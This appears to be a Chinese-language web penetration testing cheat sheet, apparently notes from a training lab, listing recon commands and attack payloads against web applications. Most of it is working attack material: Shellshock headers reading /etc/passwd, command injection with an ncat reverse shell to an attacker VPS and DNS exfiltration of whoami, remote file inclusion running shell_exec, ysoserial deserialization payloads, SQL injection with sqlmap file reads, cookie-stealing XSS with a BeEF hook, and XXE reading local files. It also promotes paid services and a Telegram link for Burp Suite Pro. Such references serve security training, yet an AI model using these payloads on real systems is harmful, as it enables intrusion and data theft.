web安全测试实验室省流版本(完整名请用base64解码):c2VjNTQyIFdFQiBBUFAgUEVORVRSQVRJT04gVEVTVElORyAmIEVUSElDQUwgSEFDS0lORw==
如果对以下内容有任何困难,请留言,支持付费服务与其他问题交流
-
burpsuite工具专业版
https://t.[m]e/zer0day1ab -
虚拟主机发现
dig
dig demo.org -t any
dig demo.org -t axfr @127.0.0.1 # @直接指定 bind 服务器,不走 DNS 查询的默认行为
dnsrecon.py
dnsrecon.py -t brt -d demo.org -n 127.0.0.1 -D /opt/dnsrecon/namelist.txt
Nmap 和 dns-brute NSE 脚本
nmap -- script=dns-brute demo.org
在线DNS数据库查询:https://dnsdumpster.com demo.org
证书透明度:https://crt.sh %.demo.org 如果你不抄袭,从来不会想到使用通配符
- 测试 HTTPS(标准违规)
https://www.ssllabs.com/ssltest/
nmap -p 443 --script=ssl-enum-ciphers www.demo.org -oN /tmp/www.demo.org.nmap
nmap --script-help ssl-enum-ciphers | less
grep "\- C" /tmp/www.demo.org.nmap
- 收集服务器信息
nmap -sV demo.org
cd /usr/share/nmap/scripts
ls
旧OSS跟踪(及供应链依赖旧版本)Retire.js
bp扩展 - bapp商店 - Retire.js
- 心脏出血
泄露账号密码,cookie等敏感信息
nmap -p 443 -sV --script ssl-heartbleed www.demo.org
- 网络爬虫
bp - New scan - Crawl - URLs to Scan - https://demo.com
.*?portswigger.net$ # 正则语法,发现子域名

其他参考值

target - URL view 查看爬虫结果

创建关键词字典
cewl http://demo.org
- 强制浏览
ffuf -w /opt/fuzzdb/discovery/predictable-filepaths/filename-dirname-bruteforce/raft-large-
directories.txt -u http://www.demo.net/FUZZ
-
POST与GET
将POST失败的利用全部换成GET -
用户名枚举
人口普查报告前TOP姓氏列表 -
Burp Intruder fuzz
/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt -
Burp Sequencer
start live capture实时捕获采集样本(参考值:几百到几万)
绿色表示熵足够,难以预测(与之相反是全红) -
cgi-bin 与 Shellshock
User-Agent: () { 42;};echo;/bin/cat /etc/passwd
User-Agent: () { 42;};echo;/usr/bin/id
- 命令注入
基线值; cat /etc/passwd
基线值; id
基线值; ncat VPS 1337 -e /bin/bash # nc -lvvnp 1337
基线值; ping -c3 VPS
基线值;a=$(whoami|base32|tr -d =);nslookup # $a.xxxxxxx.oastify.com echo dsadsads= | base32 -d
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- 文件包含
page=http://vps/id.php # <?php echo shell_exec('id');?>
- 不安全的反序列化
这个实验不切实际,但工具的使用可以借鉴
java -jar /usr/local/bin/ysoserial-master-SNAPSHOT.jar
java -jar /usr/local/bin/ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cp /1.txt /opt/app/files/1.html' > deser.obj # 调试 CommonsCollections5 对应的 java7 版本
base64 deser.obj > deser.b64
POST提交到漏洞端点,还需要对象名比如 name=payload
- 基于错误的SQL注入
不要学什么使得payload在数据库中被执行,对实际挖洞没什么帮助
fuzz字典如何使用心法:
1.提交基线值:test 返回真
2.提交语义分割符:test' 返回假,并且报错SQL语法错误(需要对比提交基线值:test 返回真的情况(长度,手动看响应,时延))
3.test' OR 1=1;# 返回真,感觉在WHERE环境中(返回假的时候,需要把它修正,找到一条明确的payload,而不是fuzz之后看这看那)
基线值' OR '1'='1
sqlmap -r 1.txt --proxy http://localhost:8080 --batch -p id --level 3 --user-agent 42 --dbs
-D sqli --tables
-D sqli -T Customers --count
--file-read /etc/passwd
- HTML注入
<img src="https://demo.org/1.jpg">
<iframe src="https://
<script>window.location="https://"</script>
<script>alert("XSS")</script>
<script>alert(document.cookie)</script>
BeEF C2 :Browser Commands(绿色操作用户看不到,橙色操作用户可能看不到,白色不确认,红色无法操作)
http://127.0.0.1:3000/hook.js (攻击者浏览器重定向到hook.js页面之外,浏览器会显示下线)
- 基于DOM XSS
与反射XSS类似
<img src="https://demo.org/1.jpg">
<iframe src="https://
<script>window.location="https://"</script>
<script>alert("XSS")</script>
<script>alert(document.cookie)</script>
-
SSRF
url=http://vps -
XXE
外部实体
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "test" >]>
## <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
## <!ENTITY xxe SYSTEM "http://vps" >]>
## <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://vps/" >]> 访问vps HTML页面并base64编码
## <!ENTITY xxe SYSTEM "expect://id" >]>
<entry>
<subject>&xxe;</subject>
<category>aaa</category>
<text>bbb</text>
</entry>
-
CSRF
burp官网一把梭 -
python与Requests 库
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
verify = False
-
WPScan 和 ExploitDB
类似于关键字与nuclei全网poc模板搜索 -
Nuclei 和 Jenkins
登录后的nuclei
nuclei -u http://demo.org:9000 -H '<PASTE YOUR SESSION COOKIE HERE>'

浙公网安备 33010602011771号